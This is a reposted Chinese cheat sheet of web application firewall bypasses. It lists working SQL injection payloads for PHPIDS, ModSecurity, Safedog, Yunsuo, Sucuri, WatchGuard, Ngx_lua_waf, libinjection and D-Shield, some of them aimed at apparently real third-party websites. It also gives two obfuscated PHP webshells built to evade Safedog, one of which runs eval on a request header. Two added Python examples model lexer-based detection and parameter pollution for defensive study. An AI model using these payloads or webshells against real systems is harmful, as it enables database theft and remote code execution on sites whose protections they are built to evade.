Common WAF bypasses
Reposted from: https://www.freebuf.com/column/228763.html
PHPIDS
Default rules of 0.6.1.1:
Blocked: /?id=1+union+select+user,password+from+mysql.user+where+user=1
Allowed: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Blocked: /?id=1+OR+1=1
Allowed: /?id=1+OR+0x50=0x50
Blocked: /?id=substring((1),1,1)
Allowed: /?id=mid((1),1,1)
Mod_Security
Default rules of 2.5.9:
Blocked: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
Allowed: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Blocked: /?id=1+OR+1=1
Allowed: /?id=1+OR+0x50=0x50
Blocked: /?id=1+and+5=6
Allowed: /?id=1+and+5!=6
Blocked: /?id=1;drop members
Allowed: /?id=1;delete members
Allowed: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
ModSecurity WAF bypass vectors
New version:
id=@:=(-- a %0a select 123 from {ftable})|0.1union-- a %0a select+1,@,3
id=@:=(-- a %0a select 123 from {ftable}).9union/*!%0aselect 1,@,3*/
id=@:=(%23 a %0a select 123 from {ftable})-\Nunion%23 a %0a select+1,@,3
id=@:=(%23 a %0a select 123 from((table)))/1e0union%23 a %0a select+1,@,3
id=@:=(%23 a %0a select 123 from((table)))/1e0union%a0(select 1,@,3)
Old version:
id=1-.0union distinctrow select 1,2,3from {f table}
id=-1 /*!50000union*/ select 1,2,.3from table
id=-1e0union distinct select 1,2,3e0from table
id=\Nunion (select 1,2,\Nfrom table)
id=.1union distinct select sql_cache1,2,3 from table
Safedog (安全狗)
Space substitutes:
/*|--|*/ in place of a space
/*...*/ in place of a space
%1f in place of a space
/*/#*/ in place of a space
/*/*/ in place of a space
http://www.safedog.cn/?id=/*' union select 1,2 from users%23*/
http://www.safedog.cn/?id=' -- ' union select 1,2 from users%23
http://www.safedog.cn/?id=%20/*%27%20union%20select%20%27*/%27,2%20from%20users%23
Keyword wrappers:
/*!50001and*/
/*!50001union*/
/*!50003select*/
/*!50001from*/ (the version number must not end in 0)
/*!union/*!*/
/*!select/*!*/
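Added example, not code from the freebuf post or from any of the WAFs named on this page: a Python scanner that puts a naive `union select` signature next to a check that tokenises the parameter the way MySQL's lexer would (plain comments dropped, the body of `/*!NNNNN ... */` kept, `%0a`/`%a0` treated as separators, numbers ending where the server would end them, `\N` read as NULL). The `in_string` argument models an injection point that sits inside a quoted literal, which is what the `/*' union select '*/` payloads above rely on: scanned from the start of a statement the payload is one comment, scanned from inside `'...'` it is a live UNION. The naive rule, the latin1 decoding and the quoted template are assumptions of this example; the payloads are the ones listed in the ModSecurity and Safedog sections.

```python
"""Lexer-style check versus a naive 'union select' signature.

Added example, not code from the freebuf post or from any WAF: the naive
rule, the quoted-parameter context and the latin1 decoding are constructed
assumptions; the payloads exercised below are the ones listed on the page.
"""
import re
from urllib.parse import unquote_plus

# A naive signature: UNION and SELECT separated by ordinary whitespace.
NAIVE_RULE = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)

# Bytes MySQL's lexer treats as token separators on a latin1 connection
# (0xa0 is the %a0 trick used in the ModSecurity vectors).
MYSQL_SPACE = " \t\n\r\x0b\x0c\xa0"
# Numbers end as soon as the server could end them, so 1e0union, .9union,
# 0.1union and 1-.0union all split into <number> <union>.
NUMBER = re.compile(r"0[xX][0-9a-fA-F]+|(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")
WORD = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")


def sql_tokens(sql, in_string=None):
    """Tokenise `sql` roughly the way MySQL does.

    Returns (kind, text) pairs, kind in {"word", "num", "str", "op"}.  Plain
    comments vanish, executable /*!NNNNN ... */ comments are re-scanned, and
    `in_string` is the quote character the application already opened around
    the injection point (None when the value is unquoted).
    """
    toks = []
    i, n = 0, len(sql)
    if in_string:
        # The attacker's first quote closes the application's string literal.
        j = sql.find(in_string)
        if j < 0:
            return [("str", sql)]
        toks.append(("str", sql[:j]))
        i = j + 1
    while i < n:
        c = sql[i]
        if c in MYSQL_SPACE:
            i += 1
        elif sql.startswith("/*!", i):
            end = sql.find("*/", i + 3)
            end = n if end < 0 else end
            body = re.sub(r"^\d{5}", "", sql[i + 3:end])  # drop the version
            toks.extend(sql_tokens(body))
            i = end + 2
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
        elif c == "#" or (sql.startswith("--", i)
                          and (i + 2 == n or sql[i + 2] in MYSQL_SPACE)):
            end = sql.find("\n", i)
            i = n if end < 0 else end + 1
        elif c in "'\"`":
            j = i + 1
            while j < n and sql[j] != c:
                j += 2 if sql[j] == "\\" else 1
            toks.append(("str", sql[i + 1:j]))
            i = j + 1
        elif sql.startswith("\\N", i):  # MySQL's NULL literal, as in \Nunion
            toks.append(("word", "null"))
            i += 2
        else:
            m = NUMBER.match(sql, i)
            if m:
                toks.append(("num", m.group()))
                i = m.end()
                continue
            m = WORD.match(sql, i)
            if m:
                toks.append(("word", m.group().lower()))
                i = m.end()
                continue
            toks.append(("op", c))
            i += 1
    return toks


def has_union_select(tokens):
    """True when the stream contains UNION [ALL|DISTINCT|DISTINCTROW] [(] SELECT."""
    seq = [t for k, t in tokens if k == "word" or (k == "op" and t == "(")]
    for i, t in enumerate(seq):
        if t != "union":
            continue
        rest = seq[i + 1:]
        if rest and rest[0] in ("all", "distinct", "distinctrow"):
            rest = rest[1:]
        if rest and rest[0] == "(":
            rest = rest[1:]
        if rest and rest[0] == "select":
            return True
    return False


def naive_hit(param):
    """What the regex signature sees after URL decoding (latin1, like the server)."""
    return bool(NAIVE_RULE.search(unquote_plus(param, encoding="latin-1")))


def lexer_hit(param, in_string=None):
    """What the lexer-based check sees for the same parameter and quote context."""
    return has_union_select(sql_tokens(unquote_plus(param, encoding="latin-1"), in_string))


if __name__ == "__main__":
    for p in ["1-.0union distinctrow select 1,2,3from {f table}",
              "-1 /*!50000union*/ select 1,2,.3from table",
              "@:=(-- a %0a select 123 from {ftable})|0.1union-- a %0a select+1,@,3"]:
        print(f"naive={naive_hit(p)!s:5} lexer={lexer_hit(p)!s:5} {p}")
    quoted = "/*' union select '*/',2 from users%23"
    print("unquoted context:", lexer_hit(quoted), " inside '...':", lexer_hit(quoted, "'"))
```

The quote context works both ways: `' -- ' union select ...` is live when the parameter is numeric (the string literal swallows the `--`) and dead inside a `'...'` literal (the `-- ` becomes a real comment), so a WAF that does not know the application's quoting cannot decide either case correctly.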
Safedog-bypassing webshell
The reposted snippet is truncated at the start (the opening `<?php` and the first array element are missing); the remainder is as published:

```php
'type','abvgpahs_rgnrep'=>'crfu');
$config = array_flip($config);
$de = function (&$value) { $value = strrev(str_rot13($value)); };
array_walk($config, $de);
@$config['recv'] = isset($_POST[$id]) ? $_POST[$id] : $_GET[$id];
$fun = function () use ($config) {
    return $config['crfu']('$pa', "{$config['type']}" . '($pa);');
};
$have = $fun();
$have($config['recv']);
?>
```

Trigger: `xx=assert&oo=phpinfo()`

After array_flip() the obfuscated strings become values, and strrev(str_rot13()) turns 'abvgpahs_rgnrep' into create_function, so $config['crfu'](...) builds a one-argument function whose body is "<decoded type>($pa);" and calls it with the request parameter named by $id; the trigger passes assert in xx and phpinfo() in oo.
A second variant takes its payload from the `xx` request header (base64, then gzuncompress, then eval):

```php
<?php eval(gzuncompress(base64_decode(getallheaders()['xx']))); ?>
```

Yunsuo (云锁)
1. php?id=-1 union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17) (insert a "(" between union and select)
2. Replace spaces with /*/*/
3. ?id=/*' union select 1,2 from users%23*/ (write the SQL statement inside /*' */)
http://www.yunsuo.com.cn/?id=/*' union select '*/',2 from users%23
http://www.yunsuo.com.cn/?id=/*%27%20union%20select%20%27*/%27,2%20from%20users%23
Sucuri
Bypass for the latest Sucuri WAF:
index.php?id=\NUNION(SElecT-1,current_user,3,4,5,6,7,8,9,10,11)-- -
http://www.uaebf.ae/Press-Release.php?id=189%20and%20@x%20:%3dconcat_ws%280x20%2c%30x6279207a6875746f756767,0x3c62723e,0x56657273696f6e203a3a20,@@global%2eversion,0x3c62723e,0x55736572203a3a20,current_user%29%20having%20.0UnIOn--%20-%0aSeLe%43t~1%2c@%78,~3,~4,~5,~6,~7,~8,~9,~10,%30x27--%20-
http://www.uaebf.ae/Press-Release.php?id=189-length(user())
http://www.uaebf.ae/Press-Release.php?id=189-case when user(+) like 'uaebf_DuB6Fuser7@localhost' then 1 else 2 end
http://www.uaebf.ae/Press-Release.php?id=189-case when right(user(+),1) like 't' then 1 else 2 end
WatchGuard
WatchGuard WAF bypass:
http://aquatlantis.asia/index.php?id=308&tbl=registos having 0/*!50000union*//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//*!50000select*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,user(),73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160-- -
Ngx_lua_waf
http://192.168.8.147/test/sql.aspx?id=1UNION/*&ID=*/SELECT null,name,null/*&Id=*/FROM master.dbo.sysdatabases
libinjection
http://test.com/sqli.mysql.php?id=1union select !<1,database() from tables
D盾 (D-Shield)
http://192.168.8.161/sql.aspx?id=1[fuzz position]union select null,null,SYSTEM_USER
http://192.168.8.161/sql.aspx?id=1.eunion select null,null,SYSTEM_USER
Combine this with the order in which IIS looks up a parameter: GET, POST, COOKIE.
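Added example, not code from the freebuf post, Ngx_lua_waf or D盾: a Python simulation of the HTTP parameter pollution the `?id=1UNION/*&ID=*/SELECT ... /*&Id=*/FROM ...` payload above depends on. Each `id` pair on the wire looks harmless on its own; ASP.NET's `Request.QueryString` folds the three case-variant keys into one comma-joined value, and the `/*,*/` that results is just a comment to SQL Server. The per-parameter WAF rule and the requests are constructed for this example; the merge rules (case-insensitive keys, duplicates joined with a comma, `Request[name]` consulting QueryString, then Form, then Cookies, which is the lookup order the D盾 note above refers to) are ASP.NET's documented behaviour.

```python
"""HTTP parameter pollution against a per-parameter WAF.

Added example, not from the freebuf post or from any WAF: the WAF rule and
the requests are constructed; the merge rules model ASP.NET's
NameValueCollection and Request[name] lookup order.
"""
import re
from urllib.parse import parse_qsl

# A rule that wants UNION ... SELECT inside a single parameter value.
RULE = re.compile(r"union\b.*?\bselect\b", re.I | re.S)

# The Ngx_lua_waf payload from the page, as the query string on the wire.
PAYLOAD = "id=1UNION/*&ID=*/SELECT null,name,null/*&Id=*/FROM master.dbo.sysdatabases"


def raw_pairs(query):
    """The (name, value) pairs exactly as they appear on the wire."""
    return parse_qsl(query, keep_blank_values=True)


def aspnet_querystring(query):
    """Merge like ASP.NET Request.QueryString: keys are case-insensitive and
    the values of a repeated key are joined with ','."""
    merged = {}
    for name, value in raw_pairs(query):
        key = name.lower()
        merged[key] = value if key not in merged else merged[key] + "," + value
    return merged


def per_parameter_hits(query):
    """Parameter names a WAF flags when it inspects each wire pair on its own."""
    return [name for name, value in raw_pairs(query) if RULE.search(value)]


def merged_hits(query):
    """Parameter names flagged when the WAF inspects the value the app will get."""
    return [name for name, value in aspnet_querystring(query).items()
            if RULE.search(value)]


def aspnet_request(query, form, cookies, name):
    """Request[name]: the first collection holding the name wins, in the
    order QueryString, Form, Cookies (each passed here as a dict)."""
    for source in (query, form, cookies):
        if name in source:
            return source[name]
    return None


if __name__ == "__main__":
    print("on the wire:", raw_pairs(PAYLOAD))
    print("as the app sees it:", aspnet_querystring(PAYLOAD)["id"])
    print("per-parameter WAF flags:", per_parameter_hits(PAYLOAD))
    print("merged-view WAF flags:", merged_hits(PAYLOAD))
```

The defensive takeaway is the second checker: inspect the value after applying the same merge the application framework applies, not the individual pairs; and for a WAF sitting in front of ASP.NET, know which collection `Request[name]` will actually return before deciding which one to scan.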